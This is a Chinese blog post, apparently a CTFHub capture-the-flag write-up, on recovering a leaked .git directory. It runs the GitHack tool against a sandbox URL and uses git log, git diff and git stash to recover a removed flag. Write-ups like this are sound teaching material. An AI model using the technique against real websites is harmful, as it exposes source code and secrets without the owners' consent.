web-信息泄露

Git泄露

当前大量开发人员使用git进行版本控制，对站点自动部署。如果配置不当,可能会将.git文件夹直接部署到线上环境。

log

利用工具-GitHack
git clone git://github.com/BugScanTeam/GitHack.git
进入GitHck文件夹，使用python2
python2 GitHack.py http://challenge-c1bea46c13604f27.sandbox.ctfhub.com:10800/.git/
还原后的文件在dist/目录下，进入
cd \dist\challenge-55b6c65232b6b6ab.sandbox.ctfhub.com_10080\
在这里检查git提交历史记录log，git log查看日志,可以看到add flag后又remove，所以检查当前版本与上一个版本的区别git diff 版本号

找到flag

Stash

• git stash用于保存本地修改，将代码切换到head提交上

• 用githack扫描网址，进入产生的文件夹中，依次执行

  git stash list //查看当前存储
  git stash pop //恢复之前的工作目录
  cat 147902533125205.txt//获得txt文件
  //得到flag
  

__EOF__

本文作者：紫炁
本文链接：https://www.cnblogs.com/skye-rs/p/16001015.html
关于博主：评论和私信会在第一时间回复。或者直接私信我。
版权声明：本博客所有文章除特别声明外，均采用 BY-NC-SA 许可协议。转载请注明出处！
声援博主：如果您觉得文章对您有帮助，可以点击文章右下角【推荐】一下。您的鼓励是博主的最大动力！